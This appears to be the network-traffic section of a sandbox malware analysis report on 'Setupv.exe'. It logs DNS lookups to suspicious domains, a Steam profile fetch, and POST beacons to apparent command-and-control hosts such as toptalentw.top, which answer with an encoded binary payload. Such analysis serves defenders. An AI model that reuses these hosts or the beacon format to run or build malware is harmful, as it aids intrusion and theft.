                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.571799994 CEST192.168.2.51.1.1.10xe28dStandard query (0)toptalentw.topA (IP address)IN (0x0001)false

                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Apr 28, 2025 19:34:09.525156975 CEST1.1.1.1192.168.2.50xa528No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:09.525156975 CEST1.1.1.1192.168.2.50xa528No error (0)pki-goog.l.google.com192.178.49.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.478075981 CEST1.1.1.1192.168.2.50xd5adNo error (0)transdataa.digital172.67.182.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.478075981 CEST1.1.1.1192.168.2.50xd5adNo error (0)transdataa.digital104.21.32.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:48.990664005 CEST1.1.1.1192.168.2.50xc121Name error (3)geographys.runnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.167403936 CEST1.1.1.1192.168.2.50x5da5Name error (3)woodpeckersd.runnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.336050987 CEST1.1.1.1192.168.2.50x3897Name error (3)tropiscbs.livenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.492019892 CEST1.1.1.1192.168.2.50x27c4Name error (3)cartograhphy.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.653400898 CEST1.1.1.1192.168.2.50x1b0dName error (3)biosphxere.digitalnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.082580090 CEST1.1.1.1192.168.2.50x9b31Name error (3)topographky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.241004944 CEST1.1.1.1192.168.2.50x8299Name error (3)climatologfy.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.598680019 CEST1.1.1.1192.168.2.50x65deName error (3)vigorbridgoe.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.751776934 CEST1.1.1.1192.168.2.50xf3faNo error (0)steamcommunity.com23.52.218.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.743921041 CEST1.1.1.1192.168.2.50xe28dNo error (0)toptalentw.top104.21.36.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.743921041 CEST1.1.1.1192.168.2.50xe28dNo error (0)toptalentw.top172.67.194.111A (IP address)IN (0x0001)false

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • transdataa.digital
                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • toptalentw.top

                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.549695172.67.182.684437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:34:28 UTC267OUTPOST /xwpa HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 57
                                                                                                                                                                                                                          Host: transdataa.digital
                                                                                                                                                                                                                          2025-04-28 17:34:28 UTC57OUTData Raw: 75 69 64 3d 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 26 63 69 64 3d
                                                                                                                                                                                                                          Data Ascii: uid=9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c&cid=
                                                                                                                                                                                                                          2025-04-28 17:34:48 UTC243INHTTP/1.1 522 <none>
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:34:48 GMT
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Cache-Control: private, no-store
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 93784f876e61475d-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.54969823.52.218.124437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC94OUTGET /profiles/76561199845513035 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC542INData Raw: 79 65 72 2e 76 69 6d 65 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 6d 65 64 61 6c 2e 74 76 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 72 65 63 61 70 74 63 68 61 2f 3b 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 6c 6f 6f 70 62 61 63 6b 2e 68 6f 73 74 20 20 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 3b 0d 0a 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 56 61 72 79 3a 20
                                                                                                                                                                                                                          Data Ascii: yer.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;Expires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: no-cacheVary:
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 73 68 61 72 65 64 2f 63 73 73 2f 6d 6f 74 69 76 61 5f 73 61 6e 73 2e 63 73 73 3f 76 3d 6e 63 36 39 76 77 6f 67 38 52 39 70 26 61 6d 70 3b 6c 3d 65 6e 67 6c 69 73 68 26 61 6d 70 3b 5f 63 64 6e 3d 63 6c 6f 75 64 66 6c 61 72 65 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 63 73 73 2f 70 72 6f 6d 6f 2f 73 75 6d 6d 65 72 32 30 31 37 2f 73 74 69 63 6b 65 72 73 2e 63 73 73 3f 76 3d 49 4e 69 5a 41 4c 77 76 44 49 62 62 26 61 6d 70 3b
                                                                                                                                                                                                                          Data Ascii: are.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css"><link href="https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb&amp;
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 50 72 65 73 65 72 76 65 5b 32 5d 20 7c 7c 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6c 61 74 4d 61 70 3b 0a 09 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 20 3d 20 5f 5f 50 72 6f 74 6f 74 79 70 65 50 72 65 73 65 72 76 65 5b 33 5d 20 7c 7c 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 3b 0a 09 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 20 3d 20 5f 5f 50 72 6f 74 6f 74 79 70 65 50 72 65 73 65 72 76 65 5b 34 5d 20 7c 7c 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 3b 0a 09 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 20 3d 20 5f 5f 50 72 6f 74 6f 74 79 70 65 50 72 65 73 65 72 76 65 5b 35 5d 20 7c 7c 20 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                          Data Ascii: Preserve[2] || Array.prototype.flatMap;Array.prototype.find = __PrototypePreserve[3] || Array.prototype.find;Array.prototype.some = __PrototypePreserve[4] || Array.prototype.some;Function.prototype.bind = __PrototypePreserve[5] || Function.prototype
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 31 2e 31 31 2e 31 2e 6d 69 6e 2e 6a 73 3f 76 3d 67 51 48 56 6c 72 4b 34 2d 6a 58 2d 26 61 6d 70 3b 6c 3d 65 6e 67 6c 69 73 68 26 61 6d 70 3b 5f 63 64 6e 3d 63 6c 6f 75 64 66 6c 61 72 65 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74
                                                                                                                                                                                                                          Data Ascii: <script type="text/javascript" src="https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l=english&amp;_cdn=cloudflare"></script><script type="text/javascript" src="https://community.cloudflare.steamstat
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6d 6f 64 61 6c 43 6f 6e 74 65 6e 74 2e 6a 73 3f 76 3d 58 66 59 72 77 69 39 7a 55 43 34 62 26 61 6d 70 3b 6c 3d 65 6e 67 6c 69 73 68 26 61 6d 70 3b 5f 63 64 6e 3d 63 6c 6f 75 64 66 6c 61 72 65 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6d 6f 64 61 6c 76 32 2e 6a 73 3f 76 3d 7a 42 58 45 75 65 78 56 51 30 46 5a 26 61 6d 70 3b 6c 3d 65 6e 67 6c 69 73 68 26
                                                                                                                                                                                                                          Data Ascii: flare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&amp;l=english&amp;_cdn=cloudflare"></script><script type="text/javascript" src="https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 09 09 09 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 35 33 38 36 36 39 39 35 34 30 36 38 38 22 3e 0a 09 09 09 0a 09 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 6d 61 67 65 5f 73 72 63 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0a 09 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                                                                                                                                                                          Data Ascii: <meta property="og:type" content="website"><meta property="fb:app_id" content="105386699540688"><link rel="image_src" href="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"><meta property="o
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 70 6c 6f 72 65 2f 22 3e 0a 09 09 09 09 09 09 44 69 73 63 6f 76 65 72 79 20 51 75 65 75 65 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 79 2f 77 69 73 68 6c 69 73 74 2f 22 3e 0a 09 09 09 09 09 09 57 69 73 68 6c 69 73 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 6f 69 6e 74 73 2f 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09
                                                                                                                                                                                                                          Data Ascii: plore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity.com/my/wishlist/">Wishlist</a><a class="submenuitem" href="https://store.steampowered.com/points/shop/">
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 75 70 70 6f 72 74 09 09 09 3c 2f 61 3e 0a 09 09 09 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 6e 6f 72 5f 6d 65 6e 75 5f 69 74 65 6d 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 63 68 61 6e 67 65 5f 6c 61 6e 67 75 61 67 65 5f 61 63 74 69 6f 6e 22 3e 0a 09 09 09 09 09 09 09 09 09 43 68 61 6e 67 65 20 6c 61 6e 67 75 61 67 65 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                          Data Ascii: <a class="menuitem " href="https://help.steampowered.com/en/">Support</a><div class="minor_menu_items"><div class="menuitem change_language_action">Change language</div>
                                                                                                                                                                                                                          2025-04-28 17:34:51 UTC1460INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6c 6f 63 61 6c 5f 6d 65 6e 75 5f 74 61 62 22 3e 3c 2f 64 69 76 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6d 65 6e 75 5f 63 74 6e 20 6c 6f 63 61 6c 6d 65 6e 75 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6d 65 6e 75 22 20 20 69 64 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 6f 63 61 6c 5f 6d 65 6e 75 22 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 6f 6e 4f 70
                                                                                                                                                                                                                          Data Ascii: </div></div></div></div><div class="responsive_local_menu_tab"></div><div class="responsive_page_menu_ctn localmenu"><div class="responsive_page_menu" id="responsive_page_local_menu" data-panel="{&quot;onOp


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.549699104.21.36.1334437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC263OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 57
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC57OUTData Raw: 75 69 64 3d 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 26 63 69 64 3d
                                                                                                                                                                                                                          Data Ascii: uid=9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c&cid=
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:34:52 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 33581
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 937850184a0247fd-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: c8 d7 39 a1 88 a8 32 4c 55 49 b1 a7 32 ea b1 55 2a f4 34 e0 30 14 7f 3a 5f e3 50 8f 2e d1 4b 06 f9 0d d8 1f fd eb a3 2c b9 6b 70 af 38 b8 15 63 58 2e da a4 97 3d ac 99 de 6f aa 86 6f 62 9c fc 8a e7 bc 80 ce 5c 24 b3 7f 1d e5 5a a8 8a b5 cf ad 28 98 33 6e 03 b1 7d 1c a7 a6 c8 e2 d5 92 0f 73 6e a8 29 97 c7 3a 8a 34 c2 7e ae a2 ef c7 2e 7e 62 3c 57 cc c1 d4 bb 27 bd fa c5 a5 1e 30 19 52 e5 89 5c d9 37 91 26 72 32 71 80 cc d8 6c 3b 4a b7 05 c8 1c 3c 4c a4 6c c1 9e ae 95 e3 03 d5 e0 07 a0 38 ef 8a 00 24 96 14 df e5 fd 07 44 28 38 5a 50 86 fa fa fb ba de 2c da c3 27 87 ed e0 dc 07 29 c1 16 47 e4 fe f9 8f 92 90 ed 8f 4a 5c 79 8b 2f 84 17 fd b8 7a d8 22 bc 36 1e 5d 87 85 b3 b6 79 29 c5 38 c6 d8 5c 5f 1c 28 96 25 86 73 92 ea 1b 95 73 ce 37 48 80 a8 14 0a 6e 5c 20
                                                                                                                                                                                                                          Data Ascii: 92LUI2U*40:_P.K,kp8cX.=oob\$Z(3n}sn):4~.~b<W'0R\7&r2ql;J<Ll8$D(8ZP,')GJ\y/z"6]y)8\_(%ss7Hn\
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: b5 45 39 8f 06 bb 67 19 42 fa b5 5a 27 a6 18 b7 64 90 65 9b 2a 63 47 69 b9 0b 6a 48 ae 27 c6 a0 07 74 a0 bf 93 63 7f dc 04 1d 15 6d 8e 4f 8d ab 23 c3 0d 2a 2f 38 37 90 d8 f8 74 c6 51 cf ea c0 75 7d 43 6d 59 70 d1 85 e4 c6 e7 91 6d 2f 11 76 3d 90 6a e7 01 27 2b 91 cd 8c 03 d3 46 9a 84 8b 9b 10 fe 40 8f 45 c8 20 e1 5e c4 36 a6 21 a0 eb f9 6d 50 ff 21 ba 5b e1 97 23 b4 b2 a3 fe 4d 5a 2d b7 bd b1 be b1 5c 93 c0 df 27 92 29 5b 3d 46 b7 6a f8 9c dd a5 cd af df c7 0a 21 9a 74 69 d2 ff c7 f7 07 fe 2c ce 32 0c 83 c7 ef 39 69 0d a0 ce e5 03 32 b6 7c b3 e5 bb 90 36 39 d7 87 8a 99 ed 7f b7 5f 3b 87 59 82 76 46 b7 bb 5b 7b d4 09 41 61 40 ad 87 fa 06 9e e4 b0 98 8e 25 79 f5 dc 35 0b 4a f8 69 5a 3e 35 f5 02 cb 00 3a 07 92 ed 8a ca 9a 6d 1c 36 e2 1f 5c 7e b2 f7 35 d2 69
                                                                                                                                                                                                                          Data Ascii: E9gBZ'de*cGijH'tcmO#*/87tQu}CmYpm/v=j'+F@E ^6!mP![#MZ-\')[=Fj!ti,29i2|69_;YvF[{Aa@%y5JiZ>5:m6\~5i
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 60 af c2 f3 7c 2f ed e0 72 64 70 8c c4 eb 42 41 94 de 10 0b 45 eb b1 6b ad 17 dc 8f ca c2 57 68 d4 ac 2e 93 12 3a 08 38 b1 fa 02 a5 55 95 f1 fd 3f 12 84 43 7b 70 02 8e 3c d5 08 16 d7 20 99 02 63 62 b5 f7 03 1f df d5 85 47 c3 ad 93 ac f1 9c 9e 69 9e 50 88 5a c3 c4 c9 74 0f 0a 89 74 6b 11 67 a9 18 e8 c6 a8 f5 00 aa 84 83 60 fd f0 7f 15 f2 82 1d e4 3e e0 ce ba 38 1b c0 fc bc 0d 21 ca 55 e1 ed 8d e5 45 c8 76 26 59 e8 b8 bc d3 fc 11 2d 32 7f d9 67 89 c2 18 26 fd 8d 0c ff 36 c3 08 bd 1f 4e f4 76 90 47 41 ca 62 3c a5 31 13 e9 7d 8e e5 da 63 cc 07 26 07 90 ba 99 c9 ab 4a 35 59 36 87 a6 96 52 1c 2d 6b 86 49 65 c5 09 3d aa c0 6b 9e 40 59 86 00 1d 40 2f b2 47 c6 d5 79 39 16 a8 e3 12 99 c6 29 04 ca 7d 83 1a 44 f3 23 1a 3d 97 bd e7 a2 87 95 d6 57 8a 53 b7 10 2b 8c 5d
                                                                                                                                                                                                                          Data Ascii: `|/rdpBAEkWh.:8U?C{p< cbGiPZttkg`>8!UEv&Y-2g&6NvGAb<1}c&J5Y6R-kIe=k@Y@/Gy9)}D#=WS+]
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC847INData Raw: ae 45 b7 f3 fa 2e 6c c1 9d 52 9a fa d7 a4 60 ba 96 22 c5 fc 9c 35 de 19 de ce fa 8c 4d 27 17 23 7f f9 a3 93 0a 8c 5c 06 ae bf 9e 4f f2 b5 8d 17 4a ae d0 b1 57 07 11 41 3c 18 67 14 56 27 6c 0d 74 3e 1f ec 5f 4b 9e ac a8 49 3e 6d 3a 60 6b b5 82 20 a0 87 52 bf 67 87 b6 6f 0c 87 b1 dc 06 0d ac 73 53 0d 61 3f a7 ce 9b 28 b9 98 64 24 53 a7 fd 57 ef 2a 04 b5 79 29 7f 6b eb 4f d8 fb 9d 68 df 2e 00 14 08 43 a8 68 36 43 fe b1 af bb d6 99 23 22 37 77 06 d2 f1 a9 2e 5e 8c 51 00 54 b5 9f 74 2e c8 b4 53 a1 2f 8d 12 db d8 49 f4 61 a8 d4 56 54 7a bf 19 92 53 fd 51 a0 34 b8 cd 91 69 ad 92 eb 50 44 76 d6 e7 40 7b f8 2d ba ad 2c 91 f2 86 13 6e 9a 94 5e af e7 09 ca 36 88 46 55 bc 52 df 8a e5 93 df 0e 4b ab f3 f8 58 17 b8 59 4d 90 31 15 69 f3 e0 95 da bd d5 5d 84 b4 8f 77 24
                                                                                                                                                                                                                          Data Ascii: E.lR`"5M'#\OJWA<gV'lt>_KI>m:`k RgosSa?(d$SW*y)kOh.Ch6C#"7w.^QTt.S/IaVTzSQ4iPDv@{-,n^6FURKXYM1i]w$
